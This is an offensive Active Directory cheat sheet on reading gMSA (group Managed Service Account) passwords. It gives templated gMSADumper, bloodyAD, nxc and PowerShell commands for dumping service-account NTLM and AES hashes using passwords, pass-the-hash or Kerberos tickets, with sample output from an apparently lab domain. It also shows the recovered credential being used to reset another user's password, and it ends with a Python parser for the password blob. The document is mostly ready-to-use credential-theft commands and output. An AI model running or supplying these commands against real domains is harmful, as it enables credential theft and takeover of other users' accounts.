Read GMSA Password
1. Set Allowed to Retrieve the Password for this MSA [Optional]
Set-ADServiceAccount -Identity "<TARGET_IDENTITY>" -PrincipalsAllowedToRetrieveManagedPassword "<USER>"
Sample Output:
TO-DO
2. Read GMSA Password
# Password
python3 gMSADumper.py -u '<USER>' -p '<PASSWORD>' -d <DOMAIN> -l <DC>
Sample Output:
$ python3 gMSADumper.py -u ted.graves -p Mr.Teddy -l intelligence.htb -d intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::745bd2c68dfc101a74f48d87027c7dc6
svc_int$:aes256-cts-hmac-sha1-96:8b2e9edb20258a45ad9084c89e7df761f3b85da5abd92849c150d4ed43f1056f
svc_int$:aes128-cts-hmac-sha1-96:798345b20bd9a8866a87b351c0ad68f3
# NTLM
python3 gMSADumper.py -u '<USER>' -p '<LM_HASH>:<NT_HASH>' -d <DOMAIN> -l <DC>
Sample Output:
$ python3 gMSADumper.py -u 'ted.graves' -p 'aad3b435b51404eeaad3b435b51404ee:421001de12db5325304b41275a0407b9' -d intelligence.htb -l intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::745bd2c68dfc101a74f48d87027c7dc6
svc_int$:aes256-cts-hmac-sha1-96:8b2e9edb20258a45ad9084c89e7df761f3b85da5abd92849c150d4ed43f1056f
svc_int$:aes128-cts-hmac-sha1-96:798345b20bd9a8866a87b351c0ad68f3
# Ticket-based Kerberos
python3 gMSADumper.py -k -d <DOMAIN> -l <DC>
Sample Output:
$ python3 gMSADumper.py -k -d intelligence.htb -l intelligence.htb
Users or groups who can read password for svc_int$:
> DC$
> itsupport
svc_int$:::745bd2c68dfc101a74f48d87027c7dc6
svc_int$:aes256-cts-hmac-sha1-96:8b2e9edb20258a45ad9084c89e7df761f3b85da5abd92849c150d4ed43f1056f
svc_int$:aes128-cts-hmac-sha1-96:798345b20bd9a8866a87b351c0ad68f3
Ref: gMSADumper
# Password
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' --host '<TARGET>' get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword
Sample Output:
$ bloodyAD -d 'intelligence.htb' -u 'ted.graves' -p 'Mr.Teddy' --host 'intelligence.htb' get object 'svc_int$' --attr msDS-ManagedPassword
distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:80d4ea8c2d5ccfd1ebac5bd732ece5e4
msDS-ManagedPassword.B64ENCODED: wcVVmCKWYOZszus92zsZDFqtPFYu960EdHowLnWB5vChR4R/yj+hgVusvxgnG1OYREO70qnEiCEfP62qLZluS/UHz53T94CItJ+YxA6W5jiWTy0L03JgE1m87NCnxrzGSXHXjp4Ja1OKDde9RrIaqGN7C7cFZth05q1bOOO+x8+jdD1xRXHKgig5LDk4inLQ1xqu7Lc4vT/hIIPx2dbS0FNwGtKu2NTTVAAB/LgVwYnfMNkpti2T0cE8R12HzjGVLV/54GLU1O8iLyXdnfgAQUdnccIlSacJ3XItjjeTWuOwCKQKmc0o8BbE+rHjA5dotmBiBHsE9bw3YsCh0SNTeA==
# NTLM
bloodyAD -d '<DOMAIN>' -u '<USER>' -p ':<HASH>' -f rc4 --host '<TARGET>' get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword
Sample Output:
$ bloodyAD -d 'intelligence.htb' -u 'ted.graves' -p ':2B576ACBE6BCFDA7294D6BD18041B8FE' -f rc4 --host 'intelligence.htb' get object 'svc_int$' --attr msDS-ManagedPassword
distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:80d4ea8c2d5ccfd1ebac5bd732ece5e4
msDS-ManagedPassword.B64ENCODED: wcVVmCKWYOZszus92zsZDFqtPFYu960EdHowLnWB5vChR4R/yj+hgVusvxgnG1OYREO70qnEiCEfP62qLZluS/UHz53T94CItJ+YxA6W5jiWTy0L03JgE1m87NCnxrzGSXHXjp4Ja1OKDde9RrIaqGN7C7cFZth05q1bOOO+x8+jdD1xRXHKgig5LDk4inLQ1xqu7Lc4vT/hIIPx2dbS0FNwGtKu2NTTVAAB/LgVwYnfMNkpti2T0cE8R12HzjGVLV/54GLU1O8iLyXdnfgAQUdnccIlSacJ3XItjjeTWuOwCKQKmc0o8BbE+rHjA5dotmBiBHsE9bw3YsCh0SNTeA==
# Password-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<PASSWORD>' -k --host '<TARGET>' get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword
Sample Output:
$ bloodyAD -d 'intelligence.htb' -u 'ted.graves' -p 'Mr.Teddy' -k --host 'intelligence.htb' get object 'svc_int$' --attr msDS-ManagedPassword
distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:80d4ea8c2d5ccfd1ebac5bd732ece5e4
msDS-ManagedPassword.B64ENCODED: wcVVmCKWYOZszus92zsZDFqtPFYu960EdHowLnWB5vChR4R/yj+hgVusvxgnG1OYREO70qnEiCEfP62qLZluS/UHz53T94CItJ+YxA6W5jiWTy0L03JgE1m87NCnxrzGSXHXjp4Ja1OKDde9RrIaqGN7C7cFZth05q1bOOO+x8+jdD1xRXHKgig5LDk4inLQ1xqu7Lc4vT/hIIPx2dbS0FNwGtKu2NTTVAAB/LgVwYnfMNkpti2T0cE8R12HzjGVLV/54GLU1O8iLyXdnfgAQUdnccIlSacJ3XItjjeTWuOwCKQKmc0o8BbE+rHjA5dotmBiBHsE9bw3YsCh0SNTeA==
# NTLM-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -p '<HASH>' -f rc4 -k --host '<TARGET>' get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword
Sample Output:
$ bloodyAD -d 'intelligence.htb' -u 'ted.graves' -p '2B576ACBE6BCFDA7294D6BD18041B8FE' -f rc4 -k --host 'intelligence.htb' get object 'svc_int$' --attr msDS-ManagedPassword
distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:80d4ea8c2d5ccfd1ebac5bd732ece5e4
msDS-ManagedPassword.B64ENCODED: wcVVmCKWYOZszus92zsZDFqtPFYu960EdHowLnWB5vChR4R/yj+hgVusvxgnG1OYREO70qnEiCEfP62qLZluS/UHz53T94CItJ+YxA6W5jiWTy0L03JgE1m87NCnxrzGSXHXjp4Ja1OKDde9RrIaqGN7C7cFZth05q1bOOO+x8+jdD1xRXHKgig5LDk4inLQ1xqu7Lc4vT/hIIPx2dbS0FNwGtKu2NTTVAAB/LgVwYnfMNkpti2T0cE8R12HzjGVLV/54GLU1O8iLyXdnfgAQUdnccIlSacJ3XItjjeTWuOwCKQKmc0o8BbE+rHjA5dotmBiBHsE9bw3YsCh0SNTeA==
# Ticket-based Kerberos
bloodyAD -d '<DOMAIN>' -u '<USER>' -k --host '<TARGET>' get object '<TARGET_OBJECT>' --attr msDS-ManagedPassword
Sample Output:
$ bloodyAD -d 'intelligence.htb' -u 'ted.graves' -k --host 'intelligence.htb' get object 'svc_int$' --attr msDS-ManagedPassword
distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
msDS-ManagedPassword.NTLM: aad3b435b51404eeaad3b435b51404ee:80d4ea8c2d5ccfd1ebac5bd732ece5e4
msDS-ManagedPassword.B64ENCODED: wcVVmCKWYOZszus92zsZDFqtPFYu960EdHowLnWB5vChR4R/yj+hgVusvxgnG1OYREO70qnEiCEfP62qLZluS/UHz53T94CItJ+YxA6W5jiWTy0L03JgE1m87NCnxrzGSXHXjp4Ja1OKDde9RrIaqGN7C7cFZth05q1bOOO+x8+jdD1xRXHKgig5LDk4inLQ1xqu7Lc4vT/hIIPx2dbS0FNwGtKu2NTTVAAB/LgVwYnfMNkpti2T0cE8R12HzjGVLV/54GLU1O8iLyXdnfgAQUdnccIlSacJ3XItjjeTWuOwCKQKmc0o8BbE+rHjA5dotmBiBHsE9bw3YsCh0SNTeA==
Ref: bloodyAD
# Password
nxc ldap <TARGET> -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' --gmsa
Sample Output:
$ nxc ldap intelligence.htb -d intelligence.htb -u 'ted.graves' -p 'Mr.Teddy' --gmsa
SMB 10.10.10.248 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.10.248 636 DC [+] intelligence.htb\ted.graves:Mr.Teddy
LDAPS 10.10.10.248 636 DC [*] Getting GMSA Passwords
LDAPS 10.10.10.248 636 DC Account: svc_int$ NTLM: 80d4ea8c2d5ccfd1ebac5bd732ece5e4
# NTLM
nxc ldap <TARGET> -d <DOMAIN> -u '<USER>' -H '<HASH>' --gmsa
Sample Output:
$ nxc ldap intelligence.htb -d intelligence.htb -u 'ted.graves' -H '421001DE12DB5325304B41275A0407B9' --gmsa
SMB 10.10.10.248 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.10.248 636 DC [+] intelligence.htb\ted.graves:421001DE12DB5325304B41275A0407B9
LDAPS 10.10.10.248 636 DC [*] Getting GMSA Passwords
LDAPS 10.10.10.248 636 DC Account: svc_int$ NTLM: 80d4ea8c2d5ccfd1ebac5bd732ece5e4
# Password-based Kerberos
nxc ldap <TARGET> -d <DOMAIN> -u '<USER>' -p '<PASSWORD>' -k --kdcHost <DC> --gmsa
Sample Output:
$ nxc ldap intelligence.htb -d intelligence.htb -u 'ted.graves' -p 'Mr.Teddy' -k --kdcHost intelligence.htb --gmsa
SMB 10.10.10.248 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.10.248 636 DC [+] intelligence.htb\ted.graves:Mr.Teddy
LDAPS 10.10.10.248 636 DC [*] Getting GMSA Passwords
LDAPS 10.10.10.248 636 DC Account: svc_int$ NTLM: 80d4ea8c2d5ccfd1ebac5bd732ece5e4
# NTLM-based Kerberos
nxc ldap <TARGET> -d <DOMAIN> -u '<USER>' -H '<HASH>' -k --kdcHost <DC> --gmsa
Sample Output:
$ nxc ldap intelligence.htb -d intelligence.htb -u 'ted.graves' -H '421001DE12DB5325304B41275A0407B9' -k --kdcHost intelligence.htb --gmsa
SMB 10.10.10.248 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.10.248 636 DC [+] intelligence.htb\ted.graves:421001DE12DB5325304B41275A0407B9
LDAPS 10.10.10.248 636 DC [*] Getting GMSA Passwords
LDAPS 10.10.10.248 636 DC Account: svc_int$ NTLM: 80d4ea8c2d5ccfd1ebac5bd732ece5e4
# Ticket-based Kerberos
nxc ldap <TARGET> -d <DOMAIN> -u '<USER>' -k --kdcHost <DC> --use-kcache --gmsa
Sample Output:
$ nxc ldap intelligence.htb -d intelligence.htb -u 'ted.graves' -k --kdcHost intelligence.htb --use-kcache --gmsa
SMB 10.10.10.248 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
LDAPS 10.10.10.248 636 DC [+] intelligence.htb\ted.graves:Mr.Teddy
LDAPS 10.10.10.248 636 DC [*] Getting GMSA Passwords
LDAPS 10.10.10.248 636 DC Account: svc_int$ NTLM: 80d4ea8c2d5ccfd1ebac5bd732ece5e4
Save as Cred
$gmsa = Get-ADServiceAccount -Identity '<TARGET_IDENTITY>' -Properties 'msDS-ManagedPassword'
Sample Output:
PS C:\programdata> $gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword'
$mp = $gmsa.'msDS-ManagedPassword'
Sample Output:
PS C:\programdata> $mp = $gmsa.'msDS-ManagedPassword'
PS C:\programdata> ConvertFrom-ADManagedPasswordBlob $mp
Version : 1
CurrentPassword : ꪌ絸禔හॐ뒟娯㔃ᴨ蝓㣹瑹䢓疒웠ᇷꀠ믱츎孻勒壉馮ၸ뛋귊餮꤯ꏗ춰䃳ꘑ畓릝樗껇쁵藫䲈酜⏬궩Œ痧蘸朘嶑侪糼亵韬⓼ↂᡳ춲⼦싸ᖥ裹沑扚羺歖㗻෪ꂓ㚬⮗㞗ꆱ긿쾏㢿쭗캵십ㇾ롤
ᒛ�䬁ማ譿녓鏶骲雰騆惿閴滭䶙竜迉竾ﵸ䲗蔍瞬䦕垞뉧⩱茾蒚⟒澽座걍盡篇
SecureCurrentPassword : System.Security.SecureString
PreviousPassword :
SecurePreviousPassword :
QueryPasswordInterval : 2019.19:45:41.4967000
UnchangedPasswordInterval : 2019.19:40:41.4967000
$password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
Sample Output:
PS C:\programdata> $password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
$SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
Sample Output:
PS C:\programdata> $SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
$cred = New-Object System.Management.Automation.PSCredential '<TARGET_IDENTITY>', $SecPass
Sample Output:
PS C:\programdata> $cred = New-Object System.Management.Automation.PSCredential 'BIR-ADFS-GMSA', $SecPass
# For example, change password of another target user
Invoke-Command -ComputerName <COMPUTER_NAME> -ScriptBlock {Set-ADAccountPassword -Identity '<ANOTHER_TARGET_NAME>' -reset -NewPassword (ConvertTo-SecureString -AsPlainText '<NEW_PASSWORD>' -force)} -Credential $cred
Sample Output:
PS C:\programdata> Invoke-Command -ComputerName . -ScriptBlock {Set-ADAccountPassword -Identity 'tristan.davies' -reset -NewPassword (ConvertTo-SecureString -AsPlainText 'Test1234' -force)} -Credential $cred
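The fields that ConvertFrom-ADManagedPasswordBlob prints above (Version, CurrentPassword, PreviousPassword and the two intervals) come from the MSDS-MANAGEDPASSWORD_BLOB structure defined in MS-ADTS. The parser below is an added example, not code from this cheat sheet or from any of the tools it lists; it decodes a blob constructed inline for the demo into those same fields, and the function names are my own.

```python
import struct
from datetime import timedelta

# MS-ADTS MSDS-MANAGEDPASSWORD_BLOB header (little-endian): Version, Reserved,
# Length, then the offsets of CurrentPassword, PreviousPassword,
# QueryPasswordInterval and UnchangedPasswordInterval.
HEADER = struct.Struct("<HHIHHHH")


def _utf16z(blob: bytes, off: int) -> str:
    """Read a NUL-terminated UTF-16LE string, scanning in 2-byte units."""
    end = off
    while blob[end:end + 2] != b"\x00\x00":
        end += 2
        if end >= len(blob):
            raise ValueError("unterminated UTF-16 string in blob")
    return blob[off:end].decode("utf-16-le")


def parse_managed_password_blob(blob: bytes) -> dict:
    """Decode the blob into the fields ConvertFrom-ADManagedPasswordBlob prints."""
    version, _res, length, cur_off, prev_off, q_off, u_off = HEADER.unpack_from(blob)
    if version != 1 or length != len(blob):
        raise ValueError("unsupported blob version or length mismatch")
    query_ticks, unchanged_ticks = (struct.unpack_from("<Q", blob, o)[0] for o in (q_off, u_off))
    return {
        "Version": version,
        "CurrentPassword": _utf16z(blob, cur_off),
        # PreviousPasswordOffset is 0 when there is no previous password yet.
        "PreviousPassword": _utf16z(blob, prev_off) if prev_off else None,
        # Intervals are stored as 100-nanosecond ticks, like a .NET TimeSpan.
        "QueryPasswordInterval": timedelta(microseconds=query_ticks // 10),
        "UnchangedPasswordInterval": timedelta(microseconds=unchanged_ticks // 10),
    }


def build_test_blob(current: str, previous: str, query_s: int, unchanged_s: int) -> bytes:
    """Constructed blob for this demo (not a real AD value); previous may be ""."""
    cur = current.encode("utf-16-le") + b"\x00\x00"
    prev = previous.encode("utf-16-le") + b"\x00\x00" if previous else b""
    cur_off = HEADER.size
    prev_off = cur_off + len(cur) if previous else 0
    body_end = cur_off + len(cur) + len(prev)
    pad = (-body_end) % 8  # AlignmentPadding so the 64-bit intervals are aligned
    q_off, u_off = body_end + pad, body_end + pad + 8
    header = HEADER.pack(1, 0, u_off + 8, cur_off, prev_off, q_off, u_off)
    ticks = struct.pack("<QQ", query_s * 10_000_000, unchanged_s * 10_000_000)
    return header + cur + prev + b"\x00" * pad + ticks
```

To decode a real value, pass the raw attribute bytes as returned over LDAP; note that the B64ENCODED string bloodyAD prints above begins with "wcVV" rather than the "AQAA" a version-1 header would produce, so it is not the whole blob.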